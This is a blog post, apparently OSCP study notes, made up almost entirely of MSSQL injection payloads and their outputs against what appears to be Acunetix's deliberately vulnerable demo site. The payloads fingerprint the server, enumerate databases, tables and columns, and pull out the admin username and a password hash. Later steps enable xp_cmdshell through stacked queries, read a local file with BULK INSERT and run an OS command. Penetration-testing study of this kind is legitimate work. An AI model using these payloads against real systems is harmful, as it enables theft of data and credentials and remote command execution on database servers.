MSSQL Injection

mssql inj
All BlogOSCP Study material

(((0x1 :- Basic Recon Stage)))

-1 union all select 1,2–

-1 union all select null,2–

null union all select 1,null–

1 union all select 1,null–

null union all select @@version,2–

null union all select schema_name,2 from information_schema.schemata–

-1 UNION SELECT table_name,2 FROM information_schema.tables–

null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name=’users’–

-1+UNION+SELECT upass,2 FROM users where uname=’admin’–

UserName

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())–

acunetix

Check if Website is Vulnerable

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1–%5BTrue%5D

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2–%5BFalse%5D

SQL Server Version

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))–

Microsoft SQL Server 2005 – 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Server Name

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))–

VPS19760

(((0x2 :- Enumerating Other Databases)))

[Listing Database Names]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))–

master

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))–

tempdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))–

model

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))–

msdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))–

acublog

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))–

acuforum

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))–

acuservice

(((0x3 :- Enumerating Table Names for each database)))

[*]Database : [master]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ ),NULL–

 spt_fallback_db

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’) ),NULL–

 spt_fallback_dev 

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’,’spt_fallback_dev’) ),NULL–

 spt_fallback_usg

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’,’spt_fallback_dev’,’spt_fallback_usg’) ),NULL–

 spt_monitor

Same Goes On….

[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ ),NULL–

comments

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ AND name not in (‘comments’) ),NULL–

news

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ AND name not in (‘comments’,’news’) ),NULL–

users

[*]Database : [acuforum]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ ),NULL–

[*]Database : [acuservice]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = ‘U’ ),NULL–

threads

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’)),NULL–

users

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’,’users’)),NULL–

forums

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’,’users’,’forums’)),NULL–

posts

Same…

0x4 :- Fetching Column Name for Tables from Same and other database

Database : [acublog]

 AND acublog..syscolumns.name NOT IN (‘uname’) ))

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’–

uname

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’ AND acublog..syscolumns.name NOT IN (‘uname’) ))–

upass

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’ AND acublog..syscolumns.name NOT IN (‘uname’,’upass’) ))–

alevel

Same Ways for other queries..

0x5:- Fetching Data from Columns

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;

admin

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;

334c4a4c42fdb79d7ebc3e73b517e6f8

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN (‘admin’);

[For now Not true but can be used if there are more rows to fetch]

(((0x4 :- Enable xp_cmdshell if current_user is ‘sa’ )))

For strting:

http://testasp.vulnweb.com/showforum.asp?name=test’; EXEC sp_configure ‘show advanced options’,1 ; RECONFIGURE ; EXEC sp_configure ‘xp_cmdshell’,1 ; RECONFIGURE ;–

For integer:

http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure ‘show advanced options’,1 ; RECONFIGURE ; EXEC sp_configure ‘xp_cmdshell’,1 ; RECONFIGURE ;–

(((0x5 :- Reading Local File and insert into Table )))

CREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM ‘C:\output.txt’;

DROP TABLE mydata;

(((0x6 :- Execute Command shell )))

‘; exec xp_cmdshell ‘net user > c:\output.txt’;–

Leave a Reply

Your email address will not be published. Required fields are marked *